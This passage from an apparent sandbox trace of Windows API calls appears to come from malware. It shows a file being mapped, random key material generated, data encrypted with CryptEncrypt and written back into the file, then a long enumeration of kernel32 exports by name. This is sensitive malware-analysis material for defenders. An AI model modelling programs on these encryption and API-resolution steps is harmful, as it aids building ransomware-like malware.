0x268 [0185.579] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.579] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.579] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.579] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.580] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.580] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.580] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.580] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.581] CloseHandle (hObject=0x268) returned 1 [0185.581] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.581] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.582] CloseHandle (hObject=0x0) returned 0 [0185.582] CloseHandle (hObject=0x264) returned 1 [0185.582] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.582] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.582] GetTickCount () returned 0x1135a22 [0185.582] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.582] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.582] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.583] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.583] lstrlenA (lpString="kernel32.dll") returned 12 [0185.583] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.583] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.583] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.583] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.583] lstrlenA (lpString="ADDATOMA") returned 8 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.583] lstrlenA (lpString="ADDATOMW") returned 8 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.583] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.583] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.583] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.583] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.584] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.584] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.584] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.584] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.584] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.584] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.584] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.584] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.584] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.584] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.584] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.584] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.584] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.584] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.584] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.584] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.584] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.584] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.584] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.585] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.585] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.585] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.585] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.585] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.585] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.585] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.585] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.585] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.585] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.585] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.585] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.585] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.585] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.585] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.585] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.585] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.585] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.585] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.586] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.586] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.586] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.586] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.586] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.586] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.586] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.586] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.586] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.586] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.586] lstrlenA (lpString="BEEP") returned 4 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.586] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.586] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.586] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.586] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.586] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.586] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.586] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.587] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.587] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.587] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.587] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.587] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.587] lstrlenA (lpString="CANCELIO") returned 8 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.587] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.587] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.587] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.587] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.587] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.587] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.587] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.587] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.587] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.587] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.587] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.587] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.587] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.587] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.588] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.588] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.588] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.588] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.588] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.588] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.588] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.588] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.588] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.588] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.588] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.588] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.588] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.589] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.589] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.589] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.589] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.589] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.589] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.589] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.589] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.589] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.589] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.589] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.589] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.589] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, 